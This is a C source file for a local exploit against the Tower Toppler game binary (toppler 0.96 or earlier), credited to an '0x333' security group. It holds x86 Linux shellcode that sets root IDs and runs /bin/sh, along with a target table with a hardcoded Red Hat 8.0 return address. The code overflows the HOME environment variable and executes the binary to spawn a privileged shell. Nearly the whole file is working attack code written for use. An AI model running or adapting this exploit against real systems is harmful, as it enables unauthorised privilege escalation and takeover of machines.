/*
 *  /usr/bin/topper local exploit
 *   vul <= topper 0.96
 *   bug: http://www.securityfocus.com/bid/8132
 *   
 *   coded by nic
 *   Ps: i have see another ex,but it have many nops. ^^:)
 *
 *  (c) 0x333 Outsiders Security Labs / www.0x333.org
 *
 */



#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <getopt.h>
#include <sys/errno.h>

#define me "tiger"


static char shellcode[] = 
    
    "\x31\xdb"                
    "\x89\xd8"                
    "\xb0\x17"                
    "\xcd\x80"               
    "\x31\xdb"                
    "\x89\xd8"                
    "\xb0\x17"               
    "\xcd\x80"                
    "\x31\xdb"               
    "\x89\xd8"                
    "\xb0\x2e"                
    "\xcd\x80"                
    "\x31\xc0"                
    "\x50"                    
    "\x68\x2f\x2f\x73\x68"           
    "\x68\x2f\x62\x69\x6e"          
    "\x89\xe3"                
    "\x50"                  
    "\x53"                    
    "\x89\xe1"          
    "\x31\xd2"               
    "\xb0\x0b"            
    "\xcd\x80"              
     "\x31\xdb"                
    "\x89\xd8"               
    "\xb0\x01"              
    "\xcd\x80";          

struct target {
    int         index;
    char         *distro;
    char         *dest;
    char         *name;
    u_long        retaddr;
    int            LEN;
};


struct target exploit[] = { 
    { 1, "redhat 8.0 -", "/usr/bin/toppler", 
        "toppler", 0xbffff9f8, 256 },
    { 0, NULL, NULL, NULL, 0, 0 }
};

void usage(char *cmd);

int main(int argc, char **argv)
{
    int     i;
    int     type;
    int        size;
    int     options;
    long     retaddr;
    char     buffer[256];

    if(argc == 1) {
        usage(argv[0]);
        exit(0);
    }

    /* options of this exploit */
    while((options = getopt(argc, argv, "ht:")) != EOF) {
        switch(options) {
            case 'h': 
                usage(argv[0]);
                exit(0);
            case 't': 
                type = atoi(optarg);
            
                if (type > 3 || type < 0) {
                    printf("Out of range!!\n");
                    exit(0);
                }
            
                if (type == 0) {
                    usage(argv[0]);
                    printf("num . description\n"
                    "----+----------------------------------------\n");            
                    for (i = 0; exploit[i].dest; i++)
                        fprintf(stderr, "[%d] | %s %s\n", exploit[i].index, exploit[i].distro, exploit[i].dest);
                    
                    exit(1);
                }            
                break;    
            default:
                usage(argv[0]);
                exit(0);
        }
    }    

    size    = exploit[type-1].LEN;
    retaddr = exploit[type-1].retaddr;

    fprintf(stderr, "\n--- nic-fuckex "me" - Tower Toppler HOME env buf overflow ex---\n"
                    "[+] by: nic\n"
                    "[+] nic-2003 - http://www.0x333.org/\n"
                    "[+] attacking: %s\n"
                    "[+] using ret: 0x%8lx\n"
                    "[+] spawning shell\n", exploit[type-1].dest, retaddr);

    for (i = 0; i < size; i += 4)
        *(long *)&buffer[i] = retaddr;
    
    memcpy(buffer + 1, shellcode, strlen(shellcode));

    setenv("HOME", buffer, 1);    /* seting env variable */

    if ( (execl(exploit[type-1].dest, exploit[type-1].name, NULL)) == -1) {
        fprintf(stderr, "Try another target, you scriptkid!\n\n");
        exit(-1);
    }

    return(0);
}

void usage(char *cmd)
{
    fprintf(stderr, "\n--- nic-fuckex "me" - Tower Toppler HOME env buff overflow ex--\n"
                    "by nic \n"
                    "nic-2003 - http://www.0x333.org/\n\n"
                    "usage: %s [-h] [-t <num>]\n"
                    "__options\n"
                    " -h\t- this help\n"
                    " -t num\t- choose target (0 for list)\n\n", cmd);
}